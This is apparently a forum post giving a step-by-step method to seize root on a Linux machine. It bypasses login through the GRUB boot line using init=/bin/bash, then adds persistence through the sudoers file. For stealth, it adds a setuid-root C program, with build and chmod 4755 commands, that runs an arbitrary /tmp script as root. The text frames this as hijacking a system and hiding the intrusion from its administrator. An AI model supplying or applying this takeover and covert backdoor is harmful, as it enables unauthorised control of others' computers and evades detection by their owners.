Note. the following procedure works only when you use Grub boot loader. Never tested with Lilo.
1. reboot your machine
2. before boot to Linux, press some key to bring up your boot loader interface
3. press "e" to edit your boot loader line, in Grub
4. add "init=/bin/bash", or "init=/bin/sh" to the end of your booting line
5. press Enter and then press "b" to boot
6. your system booted and you are root now, without login
7. Bingo. You can hijack the system now. :-)
8. To be a good citizen, I would recommend to add your own user id into the /etc/sudoers file, by using "visudo" command.
you can "sudo bash" to get a shell with root permission. You don't know the root password yet, but you can get the root permission. But this way, the root will know it's you who hacked the system by checking the "/etc/sudoers" file.
9. To do something more secret, you can get a suid program executing your script as root.
I have got a C program, you may build it and set the suid.
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
int main()
{
setuid(0);
system("/tmp/myscript.sh");
return 0;
}
10. save the program as t.c
11. gcc -o go t.c
12. chmod 4755 go
Now, you can put anything you want in /tmp/myscript.sh and run go. The /tmp/myscript.sh will be executed as root by go. Wow!
Don't do anything stupid to get yourself into trouble. Just a demonstration of some hacking technique on Linux system.
